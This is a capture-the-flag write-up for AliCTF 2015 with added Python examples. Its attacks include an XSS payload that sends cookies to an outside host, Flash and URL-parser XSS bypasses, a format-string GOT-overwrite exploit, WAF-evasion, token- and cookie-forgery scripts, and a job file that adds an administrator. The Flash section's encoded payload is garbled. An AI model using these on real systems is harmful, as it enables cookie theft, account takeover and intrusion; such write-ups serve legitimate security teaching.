AliCTF 2015 writeup

Source: Internet
Author: User
Tags: html encode, subdomain, subdomain name


0x00 Cake
Cake is an Android challenge. The program takes an input string, initialises an array of length 16 and XORs the string against the array. XOR is its own inverse, so we only need to XOR once more to get the answer.
The key is found by reading the code backwards. There are two candidate keys; to pick the correct one, go straight to the code.

a = [0, 3, 13, 19, 85, 5, 15, 78, 22, 7, 7, 68, 14, 5, 15, 42]
b = 'bobdylan'
s = ''
i = 0
for x in a:
    # XOR each array byte with the repeating key
    s += chr(x ^ ord(b[i % len(b)]))
    i += 1
print(s)


0x01 Penetration: bypass cloud WAF1

Bypass cloud WAF1 is a WAF-bypass challenge. This WAF is very hard to get through directly, so another route is needed ~

The pop-up that appears says the task has to be done under a subdomain of .alictf.com, so fuzz subdomain names:

That turns up video.alictf.com. Opening it shows no WAF in front of it, and the injection point is the id parameter.

0x02 Front-end preliminary round, question 1
Reflected XSS. Via the ph article, the content inside the tag can be HTML-encoded, and the pop-up fires.

The payload is then:
var i = new Image();
i.src = "http://ricter.me:9999/?" + document.cookie;
Read the flag from the incoming request.
0x03 password baby
password baby is a reverse-engineering challenge, and the binary is packed with UPX.
Opening it in 010 Editor shows the UPX packer; unpack it with upx -d.

Find the place where GetWindowTextA is called in IDA.

sub_405160 is the function that does the check.

The logic is simple: each byte of "himemnl" is XORed once with 0x4c, 0x5a and 0x4b in turn (which is the same as XORing with 0x5d), and that gives the password "5408031".
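Both Cake and password baby come down to undoing an XOR. The following is an added example, not code from the writeup, that does both with one helper: a repeating-key XOR for Cake's 16-byte array, and the observation that XORing a byte with several constants in sequence is the same as XORing it once with their combination (0x4c ^ 0x5a ^ 0x4b == 0x5d) for password baby. The array, key and "himemnl" are taken from the text above.

```python
def xor_with_key(data: bytes, key: bytes) -> bytes:
    """XOR data against a repeating key. XOR is an involution, so applying
    the same key twice restores the original bytes."""
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


def fold_xor_chain(*constants: int) -> int:
    """A sequence of single-byte XORs collapses to one XOR with the
    XOR of all the constants (associativity + commutativity)."""
    folded = 0
    for c in constants:
        folded ^= c
    return folded


def cake_flag() -> str:
    # array and key as given in the Cake section
    a = bytes([0, 3, 13, 19, 85, 5, 15, 78, 22, 7, 7, 68, 14, 5, 15, 42])
    return xor_with_key(a, b"bobdylan").decode()


def password_baby() -> tuple:
    # the three constants the check routine XORs each input byte with
    k = fold_xor_chain(0x4C, 0x5A, 0x4B)
    return xor_with_key(b"himemnl", bytes([k])).decode(), k


if __name__ == "__main__":
    print(cake_flag())
    print(password_baby())
```

Folding the chain first is what makes the password-baby check reversible in one step: whatever order the three constants are applied in, the net effect on every byte is a single XOR with 0x5d.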
0x04 Simple business logic
Simple business logic is a logic-flaw challenge ~
Register an account with the username Admin.

After logging in, buy -111 grass-mud horses:

That leaves a large balance; buy the most expensive item.
0x05 Front-end preliminary round, question 2
Front-end preliminary round question 2 simply hands you a Flash file to play with.
Decompile the ActionScript directly. First, ExternalInterface.call has to be used, but we find that the code deletes those characters. Then there is this finding in
//papers/948
If you need to deliver your vector to a victim behind a firewall (flashvars can be used to hide yourself), or want to get past some client-side XSS defences, this method is very effective. It all rests on the fact that Flash discards invalid URL-encoded characters:
(1) When % is followed by an invalid hexadecimal character ([^0-9a-fA-F]), Flash discards the two characters, for example:
"%X" or "%="
(2) When a valid and then an invalid hexadecimal character follow %, three characters are discarded, for example:
"%AX" or "%&"
This is how the deletion is bypassed: %X passes through the filter intact, and Flash drops it when the value reaches the call.
Then use the method in this article
/tips/2924
and attach
alert(1)}catch(e){alert(100)}//
Of course it did not pop straight away (lessons written in blood: I was stuck for a long time. Inspecting the element showed the statement was different =.=), so in the end it pops like this:
%Xdebug=\%22);alert(1);}catch(e){alert(100)}//
The final payload is:
http://8dd25e24b4f65229.alictf.com/swf.swf?%Xdebug=\%22);eval(String.fromCharCode(101,118,97,108,110,101,119,103,101,59,120,46,115,114,39,104,116,116,112,53,47,120,46,112,104,112,111,111,107,105,101,43,101,115,112,101,40,100,111,99,117,109,101,110,116,111,111,107,105,101,34,41));}catch(e){alert(100)}//
0x06 Penetration: bypass cloud WAF2
The bypass cloud WAF2 challenge says the request is not coming from the intranet, so the first step is to supply an intranet IP address. Then on to the writeup.
The system prompts that internal access is required, so fuzz the private ranges:
192.168.x.x
10.x.x.x
172.16.x.x
Addresses starting with 10. are accepted. Changing the HTTP request method to PATCH drops the protection level to moderate.
Then change the keywords, for example replacing %20 with %0b, to get past detection and inject out the flag.
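The last step generalises: a signature that keys on space-separated SQL keywords can be sidestepped with any other byte MySQL's lexer treats as whitespace (0x09-0x0d) or an inline comment. The block below is an added example, not the author's tooling: it produces encoded variants of an injection payload across several whitespace substitutions and HTTP methods, and checks them against a constructed toy signature (NAIVE_RULE) that stands in for the WAF rule, which is an assumption, not the real cloud WAF's logic.

```python
import re
from urllib.parse import quote

# bytes MySQL's lexer accepts as token separators besides 0x20, plus an inline comment
ALT_SPACES = ["\x09", "\x0a", "\x0b", "\x0c", "\x0d", "/**/"]
# the writeup found PATCH weakened the policy; trying other methods is the generalisation
METHODS = ["GET", "POST", "PUT", "PATCH", "OPTIONS"]

# constructed toy signature: a SQL keyword surrounded by encoded spaces
NAIVE_RULE = re.compile(r"(?:%20|\+)(?:union|select|and|or)(?:%20|\+)", re.I)


def mutate(payload: str):
    """Yield (method, query_string) candidates for one injection payload."""
    for ws in [" "] + ALT_SPACES:
        mutated = payload.replace(" ", ws)
        # keep the SQL punctuation readable; everything else is percent-encoded
        qs = "id=" + quote(mutated, safe="*,()=/'")
        for method in METHODS:
            yield method, qs


def blocked(qs: str) -> bool:
    """True when the toy signature would reject this query string."""
    return NAIVE_RULE.search(qs) is not None


def surviving(payload: str) -> list:
    """All (method, query_string) variants the toy signature lets through."""
    return [(m, qs) for m, qs in mutate(payload) if not blocked(qs)]


if __name__ == "__main__":
    for method, qs in surviving("1 union select 1,2"):
        print(method, qs)
```

Only the plain-space variant (%20) trips the rule; %0B, %09 and friends reach the backend unchanged and MySQL still parses them as separators, which is exactly why the %20 to %0b swap in the text works.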


0x07 Who stole your on-site SMS
Who stole your on-site SMS is a single binary challenge.
Hit F5 without thinking: sendMail prints the user input straight to printf, so there is a format-string vulnerability.
For an arbitrary write you first need your data on the stack. The user name turns out to be on the stack, and tracing it shows it sits at argument position 76, so an arbitrary-address write is possible.
I then started thinking about leaking a libc address, but going back to the code I found a print_flag... That makes it simple. After sendMail returns there are three calls to free, so I overwrote free's GOT entry to point at print_flag. Straight to the code.
# coding: utf-8
from zio import *

print_flag = 0x08048bbd   # 134515645 below is this address written in decimal
free_addr = 0x0804C014    # GOT entry of free()
# %hn stores the low 16 bits of the byte count (0x8bbd) through the pointer at argument 76
exp = "%134515645x%76$hn"
io = zio(('ploit.alictf.com', 5608))
'''
# use this block for the first registration
io.read_until('quit')
io.writeline('1')
io.read_until('name: ')
io.writeline(l32(free_addr))
io.read_until('ass: ')
io.writeline('20140901')
'''
io.read_until('quit')
io.writeline('2')
io.read_until('name: ')
io.writeline(l32(free_addr))   # the name (= free@got) lands at argument 76
io.read_until('ass: ')
io.writeline('20140901')
io.read_until('quit')
io.writeline('3')
io.read_until('To:')
io.writeline(exp)
'''
# Remove this or it will time out; write whatever you like here.
io.read_until('title: ')
io.writeline('20140901')
io.read_until('body: ')
io.writeline('20140901')
io.read_until('quit')
io.writeline('3')
'''
io.interact()
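The arithmetic behind that format string, as an added example rather than the author's code: %hn stores only the low 16 bits of the number of bytes printed so far, so a width of 35773 would have produced the same 0x8bbd as the 134515645 (= 0x08048bbd) used above, with far less output. The block builds a single %hn write, extends it to a full 32-bit value over two adjacent halves, and includes a small model of printf's byte counting to check the result offline. Argument index 76 and the addresses are taken from the text; the model assumes every %x width is at least 8 so the field is printed at exactly that width.

```python
import re

_DIRECTIVE = re.compile(r"%(\d+)x|%(\d+)\$hn")


def fmt_hn_write(value16: int, arg_index: int, already_written: int = 0) -> str:
    """Format string that stores value16 (0..0xffff) with %hn through the pointer
    at positional argument arg_index, given already_written bytes are out."""
    need = (value16 - already_written) % 0x10000
    if need < 8:              # keep the %x field wide enough to print exactly `need` chars
        need += 0x10000
    return f"%{need}x%{arg_index}$hn"


def fmt_write32(value: int, arg_index: int, already_written: int = 0) -> str:
    """Two %hn stores for a full 32-bit value. The pointer to the low half must be
    at argument arg_index and the pointer to the high half at arg_index + 1;
    the smaller half is written first so neither width goes backwards."""
    halves = sorted([(value & 0xFFFF, arg_index), (value >> 16, arg_index + 1)])
    fmt, written = "", already_written
    for half, idx in halves:
        fmt += fmt_hn_write(half, idx, written)
        written = half
    return fmt


def simulate_hn(fmt: str, already_written: int = 0) -> dict:
    """Model printf's byte counting for a chain of '%<width>x' and '%<k>$hn'
    directives; returns {argument index: 16-bit value stored}."""
    written, stores, pos = already_written, {}, 0
    for m in _DIRECTIVE.finditer(fmt):
        written += m.start() - pos        # literal bytes between directives count too
        pos = m.end()
        if m.group(2) is not None:
            stores[int(m.group(2))] = written & 0xFFFF
        else:
            written += int(m.group(1))
    return stores


if __name__ == "__main__":
    print(fmt_hn_write(0x8BBD, 76))              # short form of the writeup's payload
    print(simulate_hn("%134515645x%76$hn"))      # the writeup's payload, modelled
    print(fmt_write32(0x08048BBD, 76))           # both halves, if the high half had to change
```

The single-half write is enough here because free@got still points into the PLT stub (0x0804xxxx) before free is first called, so the high half already matches print_flag's. If it did not, fmt_write32 would need free_addr at argument 76 and free_addr+2 at argument 77 in the name field.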

0x08 Business logic and penetration
First get a normal user, go through password recovery and find the reset address:
http://jinan.alictf.com/resetpass/reset.php?pass_token=xxxxx
All I want to say is that the token here can be controlled. Looking at the password reset page, there is something at the bottom:
TestKey: 673f3e705c8d5b7af675f309e58d46c9
ServerTime: 15-03-29 20:46:03
Think again: the token is obviously an md5, so how is it composed? The TestKey and ServerTime are surely part of it, but everyone cannot have the same token, so a username must be involved too. I tried and found:
md5(username + testKey + serverTime(timestamp))
With that you can reset the admin password... except it said I was logging in remotely. Changing X-Forwarded-For, X-Real-IP and other headers did not help... Then I found an HTTP proxy online... and then... it worked. This challenge comes with regional discrimination! Done in a second!!!
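The reset token is predictable from two values the page displays and one value the attacker picks. As an added example (not the author's script), the block below forges a token for any username from TestKey and a server time, and brute-forces the server time around a known value when a token for a known user is available; the exact concatenation order md5(username + testKey + serverTime) and the serverTime being a unix timestamp are assumptions taken from the sentence above, and the TestKey value is the one shown on the page.

```python
import hashlib
import time

TEST_KEY = "673f3e705c8d5b7af675f309e58d46c9"   # value shown on the reset page


def parse_server_time(display: str, fmt: str = "%y-%m-%d %H:%M:%S") -> int:
    """Turn the displayed 'ServerTime: 15-03-29 20:46:03' string into a
    unix timestamp (interpreted in local time; an assumption)."""
    return int(time.mktime(time.strptime(display, fmt)))


def forge_token(username: str, test_key: str, server_ts: int) -> str:
    """md5(username + testKey + serverTime), the composition the writeup found."""
    return hashlib.md5(f"{username}{test_key}{server_ts}".encode()).hexdigest()


def recover_timestamp(token: str, username: str, test_key: str,
                      around: int, window: int = 300):
    """Given a token issued to a known user, find the serverTime that produced
    it within +/- window seconds of `around` (clock skew between the displayed
    time and the actual reset request)."""
    for ts in range(around - window, around + window + 1):
        if forge_token(username, test_key, ts) == token:
            return ts
    return None


if __name__ == "__main__":
    ts = parse_server_time("15-03-29 20:46:03")
    print(forge_token("admin", TEST_KEY, ts))
```

Once the timestamp for one user's token is known, the same timestamp and key give the admin token directly; the only thing left to guess is the one-second granularity, which the brute-force window covers.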
0x09 Front-end preliminary round, question 3
<script src='jquery.min.js'></script>
<script>
    function URL(url) {
        this.url = url;
        this.illegal = false;
        this.scheme = null;
        this.query = null;
        this.fragment = null;
        this.authority = '';
        this.path = '';
        this.username = null;
        this.password = null;
        this.port = 80;
    }
    URL.prototype.parse = function() {
        var url = this.url;
        // parse fragment
        var pos = url.indexOf('#');
        if (pos > -1) {
            if (url.length > pos + 1) {
                this.fragment = url.substr(pos + 1, url.length - (pos + 1));
            }
            url = url.substr(0, pos);
        }
        // parse query
        pos = url.indexOf('?');
        if (pos > -1) {
            if (url.length > pos + 1) {
                this.query = url.substr(pos + 1, url.length - (pos + 1));
            }
            url = url.substr(0, pos);
        }
        // parse scheme
        var pos1 = url.indexOf(':');
        var pos2 = url.indexOf('/');
        if (pos1 > -1 && pos2 > pos1) {
            this.scheme = url.substr(0, pos1).toLowerCase();
            url = url.substr(pos1 + 1);
            if (url.substr(0, 2) == '//') {
                url = url.substr(2);
            } else {
                this.illegal = true;
                return;
            }
        } else {
            this.illegal = true;
            return;
        }
        while (url.charAt(0) == '/') {
            url = url.substr(1);
        }
        pos = url.indexOf('/');
        if (pos == -1) {
            this.authority = url;
            this.path = '';
        } else {
            this.authority = url.substr(0, pos);
            this.path = url.substr(pos);
        }
        // parse username and password (splits on the FIRST '@')
        pos = this.authority.indexOf('@');
        if (pos == -1) {
            this.username = null;
            this.password = null;
        } else {
            this.username = this.authority.substr(0, pos);
            this.authority = this.authority.substr(pos + 1);
            pos = this.username.indexOf(':');
            if (pos == -1) {
                this.password = null;
            } else {
                this.password = this.username.substr(pos + 1);
                this.username = this.username.substr(0, pos);
            }
        }
        // parse port (splits on the FIRST ':')
        pos = this.authority.indexOf(':');
        if (pos > -1) {
            this.port = this.authority.substr(pos + 1);
            this.authority = this.authority.substr(0, pos);
        }
    };
    URL.prototype.validate = function() {
        this.parse();
        if (this.illegal) return;
        // validate scheme
        if (this.scheme != 'http' && this.scheme != 'https') {
            this.illegal = true;
            return;
        }
        if (this.username && this.username.indexOf('\\') > -1) {
            this.illegal = true;
            return;
        }
        if (this.password && this.password.indexOf('\\') > -1) {
            this.illegal = true;
            return;
        }
        if (this.authority != 'notexist.example.com') {
            this.illegal = true;
            return;
        }
    };
    URL.prototype.get = function() {
        if (this.illegal) {
            return 'default.js';
        } else {
            return this.url;
        }
    };
</script>
<script type="text/javascript">
    var url = new URL(location.search.substr(1));
    url.validate();
    url = url.get();
    $.getScript(url);
</script>

Reading the JavaScript, the parser splits the userinfo on the first '@' and the port on the first ':', while the browser treats everything up to the last '@' as userinfo. So construct the address:
http://ef4c3e7556641f00.alictf.com/xss.php?http://notexist.example.com:@notexist.example.com:@ricter.me:9999/
The validator sees the authority notexist.example.com and passes the URL through unchanged, but the browser loads the script from ricter.me:9999. The JavaScript served there is the same as in the XSS100 challenge.
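To show the parser disagreement concretely, the following added example (not part of the original page) ports the validator's authority logic above to Python line for line and compares its view of the payload with urllib.parse, which, like browsers, takes the host from after the last '@'. The payload URL is the one from the text; the port is an illustration, not the challenge's own code.

```python
from urllib.parse import urlsplit

PAYLOAD = "http://notexist.example.com:@notexist.example.com:@ricter.me:9999/"


def lenient_authority(url: str):
    """Port of URL.prototype.parse from the challenge: returns
    (scheme, authority, username, password, port) or None when the JS
    would flag the URL as illegal."""
    for sep in ("#", "?"):                  # strip fragment, then query
        pos = url.find(sep)
        if pos > -1:
            url = url[:pos]
    pos1, pos2 = url.find(":"), url.find("/")
    if not (pos1 > -1 and pos2 > pos1):
        return None
    scheme, url = url[:pos1].lower(), url[pos1 + 1:]
    if not url.startswith("//"):
        return None
    url = url[2:].lstrip("/")
    pos = url.find("/")
    authority = url if pos == -1 else url[:pos]
    username = password = None
    pos = authority.find("@")                 # FIRST '@' ends the userinfo
    if pos > -1:
        username, authority = authority[:pos], authority[pos + 1:]
        pos = username.find(":")
        if pos > -1:
            username, password = username[:pos], username[pos + 1:]
    port = 80
    pos = authority.find(":")                 # FIRST ':' starts the "port"
    if pos > -1:
        port, authority = authority[pos + 1:], authority[:pos]
    return scheme, authority, username, password, port


def validator_accepts(url: str) -> bool:
    """Port of URL.prototype.validate: True when $.getScript(url) would run."""
    parsed = lenient_authority(url)
    if parsed is None:
        return False
    scheme, authority, username, password, _ = parsed
    if scheme not in ("http", "https"):
        return False
    if username and "\\" in username:
        return False
    if password and "\\" in password:
        return False
    return authority == "notexist.example.com"


def browser_host(url: str):
    """What a WHATWG-style parser (and urllib) uses as the host: the part
    after the LAST '@' in the authority."""
    return urlsplit(url).hostname


if __name__ == "__main__":
    print(lenient_authority(PAYLOAD))
    print(validator_accepts(PAYLOAD), browser_host(PAYLOAD))
```

The fix is not a longer blocklist: validate the host with the same parser the consumer uses (in the browser, `new URL(candidate).hostname`), or better, avoid loading scripts from attacker-supplied URLs at all.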
0x10 Simple business logic 2
<?php
function encrypt($plain) {
    $plain = md5($plain);
    $V = md5('??????');
    $rnd = md5(substr(microtime(), 11));
    $cipher = '';
    // first 32 bytes: md5(plain) XOR rnd
    for ($i = 0; $i < strlen($plain); $i++) {
        $cipher .= ($plain[$i] ^ $rnd[$i]);
    }
    // last 32 bytes: rnd itself
    $cipher .= $rnd;
    $V .= strrev($V);
    // all 64 bytes XOR (V . strrev(V))
    for ($i = 0; $i < strlen($V); $i++) {
        $cipher[$i] = ($cipher[$i] ^ $V[$i]);
    }
    return str_replace('=', '', base64_encode($cipher));
}

function decrypt($cipher) {
    $V = md5('??????');
    $cipher_1 = base64_decode($cipher);
    if (strlen($cipher_1) != 64) {
        return 'xx';
    }
    $V .= strrev($V);
    $plain = $cipher_1;
    for ($i = 0; $i < strlen($V); $i++) {
        $plain[$i] = ($cipher_1[$i] ^ $V[$i]);
    }
    $ran = substr($plain, 32, 32);
    $plain = substr($plain, 0, 32);
    for ($i = 0; $i < strlen($ran); $i++) {
        $plain[$i] = ($plain[$i] ^ $ran[$i]);
    }
    return $plain;
}
?>

Reading the PHP code on the page gives the encryption and decryption algorithm:
1. the username is md5'd and XORed with a randomly generated md5 (rnd);
2. username md5 ^ rnd, followed by rnd, forms ciphertext 1;
3. ciphertext 1 is XORed with an unknown md5 (V) concatenated with strrev(md5(V));
4. the result, base64-encoded, is the final ciphertext.
So the first 32 bytes are:
md5("Guest") ^ md5(rnd) ^ md5(V)
and the last 32 bytes are:
md5(rnd) ^ strrev(md5(V))
To change the username in the first 32 bytes from Guest to Admin, without knowing V or rnd, XOR them with:
md5("Guest") ^ md5(rnd) ^ md5(V) ^ md5("Guest") ^ md5("Admin")
which leaves md5("Admin") ^ md5(rnd) ^ md5(V). So a short Python script produces the final result )_
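That forgery, as an added example rather than the author's script: a Python port of the page's encrypt()/decrypt() so the attack can be checked offline, plus forge(), which turns a Guest cookie into an Admin cookie using only public values. The secret behind md5('??????') is unknown, so a made-up one is passed in; the random md5 stands in for md5(substr(microtime(), 11)). Note the '=' stripping in the PHP: base64_decode tolerates missing padding, Python's does not, so the padding is restored before decoding.

```python
import base64
import hashlib
import os


def _md5hex(s: str) -> str:
    return hashlib.md5(s.encode()).hexdigest()


def _xor(a: str, b: str) -> str:
    """PHP-style character XOR of two equal-length strings."""
    return "".join(chr(ord(x) ^ ord(y)) for x, y in zip(a, b))


def _b64decode_unpadded(s: str) -> str:
    return base64.b64decode(s + "=" * (-len(s) % 4)).decode("latin-1")


def encrypt(plain: str, secret: str) -> str:
    """Port of the page's encrypt(): (md5(plain) ^ rnd) || rnd, then ^ (V || strrev(V))."""
    h, rnd = _md5hex(plain), _md5hex(os.urandom(8).hex())   # rnd: stand-in for md5(microtime)
    v = _md5hex(secret)
    cipher = _xor(_xor(h, rnd) + rnd, v + v[::-1])
    return base64.b64encode(cipher.encode("latin-1")).decode().rstrip("=")


def decrypt(cookie: str, secret: str) -> str:
    """Port of the page's decrypt(): returns md5(username) hex, or 'xx' on bad length."""
    raw = _b64decode_unpadded(cookie)
    if len(raw) != 64:
        return "xx"
    v = _md5hex(secret)
    plain = _xor(raw, v + v[::-1])
    return _xor(plain[:32], plain[32:])


def forge(cookie: str, old_user: str, new_user: str) -> str:
    """Rewrite a cookie issued to old_user into one for new_user WITHOUT the secret.
    Only the first 32 bytes depend on the username, and XOR is malleable:
    C ^ md5(old) ^ md5(new) replaces md5(old) with md5(new) under the keystream."""
    raw = _b64decode_unpadded(cookie)
    patched = _xor(_xor(raw[:32], _md5hex(old_user)), _md5hex(new_user)) + raw[32:]
    return base64.b64encode(patched.encode("latin-1")).decode().rstrip("=")


if __name__ == "__main__":
    guest = encrypt("Guest", "constructed-secret")
    print(guest)
    print(decrypt(forge(guest, "Guest", "Admin"), "constructed-secret") == _md5hex("Admin"))
```

The server never authenticates the ciphertext (no MAC), which is the whole weakness: any XOR-based construction without integrity protection lets an attacker flip known plaintext into chosen plaintext.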

After login, the cookie also contains a serialize injection that filters parentheses, but that fell within minutes..

0x11 Penetration preliminary round
It's a website to penetrate ~
From the URL you can guess the registration URL by changing "action" to "register"; then modify the frontend to bypass the restriction on account registration.

There is a directory listing vulnerability in avatar modification, through which the website backup file is found.

Enter the admin panel address and bypass the password. The first layer of the shield is bypassed with a multipart form; the second layer with a plain or {x 1}#

Code audit shows a second-order injection vulnerability in the user_bak function (about...).

This yields the super administrator password, h4xxxx!@#.
Then a rant:
The challenge is good, but the way it was finally solved... Creating folders with ADS is something one can think of, but admin_pic is really a stretch. In the end teammate eee created a new folder, changed the admin_pic cookie, and used ::$DATA to upload the php file.
0x12 Title: yundun
Description: your current token is 27638e649e4371f54eddb9a201f1b78c.
Server: ageis.alictf.com
Please try to create a new Administrators-group account on the server, named after your contestant account.
After creating it, visit http://ageis.alictf.com; if you can see content in the form "nickname: string",
concatenate that string with your token as the flag.
A. There is an account named alictf on the server with a weak password.
B. The operating system is Windows Server 2003 x64.
C. The machine has the VPN service enabled.
D. To avoid affecting other contestants, no operation on the server will actually succeed, but all operations are fully recorded.
E. Do not attack the competition servers. Attacks are recorded; we will block the contestant's IP addresses and cancel their qualification.
Obviously you need to log in to the VPN. A manual test with
alictf:123456
logs in directly. ifconfig shows the IP address 172.16.0.1; a port scan finds 80, 445, 1025, 1723 and 3389 open. Nothing to think about: 3389 is definitely not going to work, and SNMP is unlikely, so go straight for SMB. I wanted to throw msf at it blindly, but nothing worked no matter what. Then I read the official hint and found there were two files in the Windows scheduled-tasks folder, i.e. the directory
C:\windows\tasks
When at did not work at first I wondered whether it was because no path was given, so I kept testing:
at \\172.16.0.1 xx:xx c:\windows\tasks\server.exe

in an attempt to get a remote shell, but it kept failing. Then I re-read the official description:
To avoid affecting other contestants, no operation on the server will succeed, but all operations are fully recorded.
If nothing is executed, what use is a remote-control tool... So run the command directly! But here is the most wonderful thing in life: commands cannot be executed that way either!!! So what about restoring the original data: since this is the scheduled-tasks folder, I could copy a job file in directly. That is not guaranteed to work, because on some versions scheduled tasks are tied to the registry, but in a competition you try regardless, and the job has to be created locally first:
at xx:xx "net user eee password /add & net localgroup administrators eee /add"
This generates a job file in c:\windows\tasks\. If I copy that file over, will it produce a scheduled task? Just do it:
copy At1.job \\172.16.0.1\Tasks\
Copy it in, and just in case also as At2.job and At65535.job, then wait for the server to execute it!
